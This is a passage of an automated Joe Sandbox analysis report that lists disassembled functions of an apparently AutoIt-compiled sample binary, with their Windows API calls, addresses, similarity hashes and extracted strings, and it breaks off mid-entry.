                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                    • String ID: close all
                                                                                                                    • API String ID: 4174999648-3243417748
                                                                                                                    • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                                    • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                    • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                                    • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                    Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1291720006-3916222277
                                                                                                                    • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                    • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                    • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                    • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                    Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                    • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                    • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                    • String ID: 0$2
                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                    • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                    • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                    • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                    • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                    Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                    • String ID: crts
                                                                                                                    • API String ID: 586820018-3724388283
                                                                                                                    • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                    • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                    • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                    • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                    Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                    • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                    • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                    • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2326526234-1173974218
                                                                                                                    • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                    • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                    • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                    • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                    Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                    • _wcslen.LIBCMT ref: 004335F2
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                    • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                    • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                      • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 321622961-2967466578
                                                                                                                    • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                                    • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                    • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                                    • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                    Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                    • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                                    • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                    • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                                    • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                                    Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                    • _wprintf.LIBCMT ref: 004340A1
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                    Strings
                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                    • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                    • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                    • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                    • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                    Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                    • __lock.LIBCMT ref: 00417981
                                                                                                                      • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                      • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                      • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                    • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                    • __lock.LIBCMT ref: 004179A2
                                                                                                                    • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                    • String ID: KERNEL32.DLL$pI
                                                                                                                    • API String ID: 637971194-197072765
                                                                                                                    • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                    • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                    • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                    • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                    Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1938898002-0
                                                                                                                    • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                    • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                    • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                    • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                    Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                    • _memmove.LIBCMT ref: 0044B555
                                                                                                                    • _memmove.LIBCMT ref: 0044B578
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2737351978-0
                                                                                                                    • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                    • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                    • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                    • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                    Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                    • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                    • __getptd.LIBCMT ref: 00415253
                                                                                                                    • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                    • _free.LIBCMT ref: 0041529E
                                                                                                                    • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3638380555-0
                                                                                                                    • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                    • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                    • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                    • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                    Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
